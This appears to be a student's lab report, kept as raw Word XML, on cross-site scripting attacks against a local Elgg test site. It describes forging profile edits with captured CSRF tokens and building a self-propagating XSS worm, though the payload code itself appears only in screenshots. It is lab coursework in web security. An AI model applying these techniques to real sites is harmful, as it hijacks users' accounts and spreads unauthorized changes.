        <w:t>: If the Elgg application only provide the Editor mode for the “About Me” field, i.e., you cannot switch to the Text mode, can you still launch a successful attack?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB522E" w:rsidRPr="00CB522E" w:rsidRDefault="00CB522E" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ans</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: No. </w:t>
      </w:r>
      <w:r w:rsidR="00D13674">
        <w:t>The Editor mode will append &lt;p&gt; and &lt;/p&gt; HTML code to the start and the end of the code, effectively disabling the Java</w:t>
      </w:r>
      <w:r w:rsidR="006B12E9">
        <w:t>script code from being run on the victims’ browser</w:t>
      </w:r>
      <w:r w:rsidR="00D13674">
        <w:t>. The code will instead just be displayed on the “About Me” section on the attacker’s profile page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00081932" w:rsidRDefault="00081932">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00452A0C" w:rsidRDefault="00452A0C" w:rsidP="00452A0C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>ask 5</w:t>
      </w:r>
      <w:r w:rsidR="00B102FF">
        <w:t>: Modifying</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Victim’</w:t>
      </w:r>
      <w:r w:rsidR="00B102FF">
        <w:t>s Profile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078230F" w:rsidRDefault="0078230F" w:rsidP="00291849"/>
    <w:p w:rsidR="0084646A" w:rsidRDefault="0084646A" w:rsidP="0084646A">
      <w:r>
        <w:t xml:space="preserve">Let’s assume that Charlie is an account that Samy created to carry out investigations. We log into Charlie’s account on Samy’s machine and attempt to </w:t>
      </w:r>
      <w:r w:rsidR="000335CA">
        <w:t>change the “About Me” info:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335CA" w:rsidRDefault="000335CA" w:rsidP="0084646A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75631A6E" wp14:editId="79A72603">
            <wp:extent cx="4257304" cy="30369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8196" cy="3037604"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084646A" w:rsidRDefault="0084646A" w:rsidP="0084646A">
      <w:r>
        <w:t xml:space="preserve">The following get request is captured on the HTTP Header Live and is enlarged to see </w:t>
      </w:r>
      <w:r w:rsidR="000335CA">
        <w:t>more of the HTML body we need</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000335CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FDC2744" wp14:editId="632DABA9">
            <wp:extent cx="4328556" cy="1959874"/>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9265" cy="1964723"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084646A" w:rsidRDefault="0084646A" w:rsidP="0084646A">
      <w:r>
        <w:t xml:space="preserve">The URL </w:t>
      </w:r>
      <w:r w:rsidR="000335CA">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="0078263C">
        <w:t>http:</w:t>
      </w:r>
      <w:r w:rsidR="00C92642">
        <w:t>//www.csslabelgg.com/action/profile/edit</w:t>
      </w:r>
      <w:r w:rsidR="000335CA">
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidR="00C92642">
        <w:t>HTML body</w:t>
      </w:r>
      <w:r w:rsidR="000335CA">
        <w:t xml:space="preserve"> consists of the following parameters</w:t>
      </w:r>
      <w:r w:rsidR="00C92642">
        <w:t xml:space="preserve"> (we need)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084646A" w:rsidRDefault="000335CA" w:rsidP="0084646A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>guid</w:t>
      </w:r>
      <w:r w:rsidR="00C92642">
        <w:t xml:space="preserve"> (at the back)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335CA" w:rsidRDefault="000335CA" w:rsidP="0084646A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>__elgg_ts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335CA" w:rsidRDefault="000335CA" w:rsidP="0084646A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>__elgg_token</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335CA" w:rsidRDefault="000335CA" w:rsidP="0084646A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000335CA" w:rsidRDefault="000335CA" w:rsidP="0084646A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C92642" w:rsidRDefault="00C92642" w:rsidP="0084646A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>accesslevel[description]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084646A" w:rsidRDefault="0084646A" w:rsidP="0084646A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We log in back to Samy’s account and edit his ‘About Me’ info in ‘Edit HTML’ mode. Refer to </w:t>
      </w:r>
      <w:r w:rsidR="001843CF">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>edit_profile</w:t>
      </w:r>
      <w:r w:rsidR="005225CD">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.html</w:t>
      </w:r>
      <w:r w:rsidR="00865877">
        <w:t xml:space="preserve"> to view the </w:t>
      </w:r>
      <w:r>
        <w:t>HTML code that is keyed in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A96E3C" w:rsidRDefault="0078263C" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12F8D837" wp14:editId="68E53C10">
            <wp:extent cx="5943600" cy="42405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40530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078263C" w:rsidRDefault="0078263C" w:rsidP="00291849">
      <w:r>
        <w:t>After this is saved, we go to Alice’s machine and view her original profile:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078263C" w:rsidRDefault="0078263C" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18CBE773" wp14:editId="3D22076C">
            <wp:extent cx="4793609" cy="2909454"/>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7545" cy="2917913"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078263C" w:rsidRDefault="00982944" w:rsidP="00291849">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">After that, we visit Samy’s profile using Alice’s account. </w:t>
      </w:r>
      <w:r w:rsidR="00821C8E">
        <w:t>Then, we view her profile page again. This time, her description has changed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00821C8E" w:rsidRDefault="00821C8E" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0833F89E" wp14:editId="06C1ED03">
            <wp:extent cx="5415148" cy="3279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8721" cy="3281337"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E711C6" w:rsidRDefault="00E711C6">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079589A" w:rsidRDefault="0079589A" w:rsidP="0079589A">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Questions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079589A" w:rsidRDefault="0079589A" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Q3</w:t>
      </w:r>
      <w:r>
        <w:t>: Why do we need Line (1)? Remove this line, and repeat your attack. Report and explain your observation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079589A" w:rsidRDefault="0079589A" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ans</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079589A" w:rsidRDefault="0079589A" w:rsidP="00291849">
      <w:r>
        <w:t>We need line 1 because as the attacker, we do not want to end up modifying our own description. If that happens, our attack script will be overwritten and the attack would not work when users visit our profile page anymore.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0079589A" w:rsidRDefault="0079589A" w:rsidP="00291849">
      <w:r>
        <w:t xml:space="preserve">To prove this, the line is removed. Refer to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E711C6">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>edit_profile_modifie</w:t>
      </w:r>
      <w:r w:rsidR="00075A09">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>d.html</w:t>
      </w:r>
      <w:r w:rsidR="00865877">
        <w:t xml:space="preserve"> to view the </w:t>
      </w:r>
      <w:r>
        <w:t>HTML code tha</w:t>
      </w:r>
      <w:r w:rsidR="00E711C6">
        <w:t>t is keyed in.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E711C6" w:rsidRDefault="00E711C6" w:rsidP="00291849">
      <w:r>
        <w:t>After this is saved and we are returned to Samy’s profile description page</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and nothing is shown as our script is executed. However, when the page is refreshed, we see that Samy’s description has changed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E711C6" w:rsidRDefault="00E711C6" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19E307D4" wp14:editId="6FFCC873">
            <wp:extent cx="5628904" cy="405389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4695" cy="4086870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E711C6" w:rsidRDefault="00E711C6">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E711C6" w:rsidRDefault="00E711C6" w:rsidP="00291849">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>To check whether the script still works on other users, we first edit Alice’s profile to have a blank description again:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E711C6" w:rsidRDefault="00E711C6" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CD5502E" wp14:editId="2747FDBD">
            <wp:extent cx="3253839" cy="2997633"/>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7698" cy="3001188"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E711C6" w:rsidRDefault="00E711C6" w:rsidP="00291849">
      <w:r>
        <w:t>When another she visits this Samy’s profile and comes back to her own user page, nothing is changed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E711C6" w:rsidRDefault="00BD27E4" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F04C098" wp14:editId="645D5CA3">
            <wp:extent cx="3170712" cy="29210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8421" cy="2928154"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD27E4" w:rsidRDefault="00BD27E4" w:rsidP="00291849">
      <w:r>
        <w:t>This is because Samy’s script has been overwritten by his own code and now the script does not exist in his description anymore.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD27E4" w:rsidRDefault="00BD27E4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD27E4" w:rsidRDefault="00BD27E4" w:rsidP="00BD27E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>ask 6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00426168">
        <w:t>Writing a Self-Propagating XSS Worm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD27E4" w:rsidRDefault="00BD27E4" w:rsidP="00291849"/>
    <w:p w:rsidR="00151BD4" w:rsidRDefault="00151BD4" w:rsidP="00291849">
      <w:r>
        <w:t>We will be following the DOM approach.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030746B" w:rsidRDefault="0030746B" w:rsidP="0030746B">
      <w:r>
        <w:t>On Samy’s machine, we</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> edit his ‘About Me’ info in ‘Edit HTML’ mode. Refer to </w:t>
      </w:r>
      <w:r w:rsidR="00F32864">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>xss_worm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.html</w:t>
      </w:r>
      <w:r w:rsidR="00865877">
        <w:t xml:space="preserve"> to view the </w:t>
      </w:r>
      <w:r>
        <w:t>HTML code that is keyed in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191A6D" w:rsidRDefault="00191A6D" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="200DED08" wp14:editId="15D4AE4B">
            <wp:extent cx="5290457" cy="385706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417" cy="3858489"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191A6D" w:rsidRDefault="00191A6D" w:rsidP="00191A6D">
      <w:r>
        <w:t>After this is saved, we go to Alice’s machine and view her original profile:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191A6D" w:rsidRDefault="00191A6D" w:rsidP="00191A6D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1968262F" wp14:editId="4B8D90F8">
            <wp:extent cx="4156364" cy="252268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2099" cy="2532233"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191A6D" w:rsidRDefault="00191A6D" w:rsidP="00191A6D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>After that, we visit Samy’s profile using Alice’s account. Then, we view her profile page again. This time, her description has changed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191A6D" w:rsidRDefault="00191A6D" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51E224DD" wp14:editId="290D84B0">
            <wp:extent cx="5339033" cy="35091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5186" cy="3513203"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191A6D" w:rsidRDefault="00191A6D" w:rsidP="00291849">
      <w:r>
        <w:t>To test whether the worm propagates, we log into another account, Boby, on Alice’s machine. We view Boby’s original profile:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191A6D" w:rsidRDefault="00191A6D" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="174EA2BC" wp14:editId="11F49757">
            <wp:extent cx="5529770" cy="35329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1994" cy="3540719"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191A6D" w:rsidRDefault="00191A6D" w:rsidP="00291849">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We visit Alice’s profile using Boby’s account. Then, we view his</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> profile page ag</w:t>
      </w:r>
      <w:r>
        <w:t>ain. This time, his</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> description has changed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191A6D" w:rsidRDefault="00191A6D" w:rsidP="00291849">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01D3CF7F" wp14:editId="680F526E">
            <wp:extent cx="5343896" cy="34152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5760" cy="3416489"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6779B" w:rsidRDefault="00191A6D" w:rsidP="00291849">
      <w:r>
        <w:t>We have successfully created a XSS worm that propagates itself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00191A6D" w:rsidRPr="00221E45" w:rsidRDefault="00191A6D" w:rsidP="00291849">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00191A6D" w:rsidRPr="00221E45">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993" w:rsidRDefault="00780993" w:rsidP="00ED7865">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00780993" w:rsidRDefault="00780993" w:rsidP="00ED7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993" w:rsidRDefault="00780993" w:rsidP="00ED7865">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00780993" w:rsidRDefault="00780993" w:rsidP="00ED78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865" w:rsidRPr="00FD7E15" w:rsidRDefault="00ED7865" w:rsidP="00ED7865">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:i/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00FD7E15">
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t>Name: Kwa Li Ying</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00ED7865" w:rsidRPr="00FD7E15" w:rsidRDefault="00ED7865" w:rsidP="00ED7865">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:i/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00FD7E15">
      <w:rPr>
        <w:i/>
      </w:rPr>
      <w:t>Student ID: 1003833</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00ED7865" w:rsidRPr="00ED7865" w:rsidRDefault="00ED7865" w:rsidP="00ED78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E10EE3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7149348"/>
    <w:lvl w:ilvl="0" w:tplc="B324DED2">
      <w:start w:val="5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20"/>
    <w:rsid w:val="000335CA"/>
    <w:rsid w:val="00064189"/>
    <w:rsid w:val="00075A09"/>
    <w:rsid w:val="00081932"/>
    <w:rsid w:val="000A2DFB"/>
    <w:rsid w:val="000C28DF"/>
    <w:rsid w:val="00151BD4"/>
    <w:rsid w:val="001843CF"/>
    <w:rsid w:val="00191A6D"/>
    <w:rsid w:val="001C2A4B"/>
    <w:rsid w:val="001E5D2D"/>
    <w:rsid w:val="001F2094"/>
    <w:rsid w:val="00221E45"/>
    <w:rsid w:val="00243B61"/>
    <w:rsid w:val="00280820"/>
    <w:rsid w:val="00291849"/>
    <w:rsid w:val="0030746B"/>
    <w:rsid w:val="00376A33"/>
    <w:rsid w:val="004046FA"/>
    <w:rsid w:val="00426168"/>
    <w:rsid w:val="00452A0C"/>
    <w:rsid w:val="004D0B66"/>
    <w:rsid w:val="004E0B62"/>
    <w:rsid w:val="005225CD"/>
    <w:rsid w:val="00554CBB"/>
    <w:rsid w:val="005A5084"/>
    <w:rsid w:val="006B12E9"/>
    <w:rsid w:val="006C19AA"/>
    <w:rsid w:val="00763BE3"/>
    <w:rsid w:val="00780993"/>
    <w:rsid w:val="0078230F"/>
    <w:rsid w:val="0078263C"/>
    <w:rsid w:val="0079589A"/>
    <w:rsid w:val="007C346B"/>
    <w:rsid w:val="007D5382"/>
    <w:rsid w:val="00821C8E"/>
    <w:rsid w:val="0084646A"/>
    <w:rsid w:val="008626EC"/>
    <w:rsid w:val="00865877"/>
    <w:rsid w:val="00876EBD"/>
    <w:rsid w:val="00903892"/>
    <w:rsid w:val="0097670E"/>
    <w:rsid w:val="00982944"/>
    <w:rsid w:val="009956B0"/>
    <w:rsid w:val="009B6558"/>
    <w:rsid w:val="009E4ADC"/>
    <w:rsid w:val="00A96E3C"/>
    <w:rsid w:val="00B102FF"/>
    <w:rsid w:val="00B30C2F"/>
    <w:rsid w:val="00BD1143"/>
    <w:rsid w:val="00BD27E4"/>
    <w:rsid w:val="00C401B8"/>
    <w:rsid w:val="00C92642"/>
    <w:rsid w:val="00CB522E"/>
    <w:rsid w:val="00D13674"/>
    <w:rsid w:val="00D30BB6"/>
    <w:rsid w:val="00E33536"/>
    <w:rsid w:val="00E711C6"/>
    <w:rsid w:val="00ED427E"/>
    <w:rsid w:val="00ED7865"/>
    <w:rsid w:val="00F22DF8"/>
    <w:rsid w:val="00F32864"/>
    <w:rsid w:val="00F45705"/>
    <w:rsid w:val="00F52995"/>
    <w:rsid w:val="00F53D51"/>
    <w:rsid w:val="00F67088"/>
    <w:rsid w:val="00F6779B"/>
    <w:rsid w:val="00F942AF"/>
    <w:rsid w:val="00F96DF1"/>
    <w:rsid w:val="00FF6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4F98E4-D5B2-4DE6-9062-E0C2C161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0B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B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7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865"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00ED7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865"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D30B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0BB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91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17</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 Li Ying</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kwa Li Ying</cp:lastModifiedBy>
  <cp:revision>54</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-03T17:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-04T10:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>